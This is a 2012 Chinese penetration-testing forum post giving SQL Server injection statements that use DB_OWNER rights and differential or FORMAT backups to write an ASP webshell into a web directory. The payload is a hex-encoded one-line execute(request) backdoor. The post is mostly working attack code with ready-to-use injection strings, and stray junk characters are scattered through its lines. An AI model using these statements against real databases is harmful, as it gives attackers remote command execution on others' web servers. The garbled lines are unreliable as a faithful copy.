中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
# Z7 R+ M5 t( C7 f+ Y7 x) h, F2 E7 o2 X# l
一利用差异备份2 O' a7 D) ?9 V$ y* F# ^
加一个参数WITH DIFFERENTIAL
. r5 E6 v1 O/ H( F, \5 p
( y+ O3 c- Z0 z- [4 Pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s* n$ D# n+ X, Z9 L3 W/ O
create table [dbo].[xiaolu] ([cmd] [image]);
/ U5 ?% e9 J* S5 Q! n7 ^insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)& K; {& |  O( J( x/ q* I7 d
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
) @. n) B$ r+ ^4 U4 ?
1 ^" o5 g7 j5 ^2 v+ p5 \二利用完全FORMAT5 L8 K7 s+ Z+ q  x- w4 X' A" w
加一个参数WITH FROMAT
& v0 b5 f$ W" Y" H$ }$ X4 e有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以6 U0 R  m# w3 |
  ~9 |2 e5 o* s. K9 b1 m
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
8 y% R/ g- q# |create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  `3 I& c2 n9 W" f% p
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
; _2 b' o: S; t* j
. z+ [3 Y4 M, t# a" L& d3 N3 I总的来说就是那么简单几句,下面以备份数据库model为例子
$ e: W' [! }9 q0 N4 s+ z6 s8 Y& y  g' f  k% m) v/ W1 H2 s
id=1;use model create table cmd(str image);insert into cmd(str) values (”)
& H( u; I' k9 T5 S' M- B$ M1 ~6 x" R2 b! g& `* X3 [% l: T$ A
id=1;backup database model to disk=’你的路径‘ with differential,format;–$ U: E4 G" ~+ H' Y0 I

6 t; N4 G3 t; ^7 W( l



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2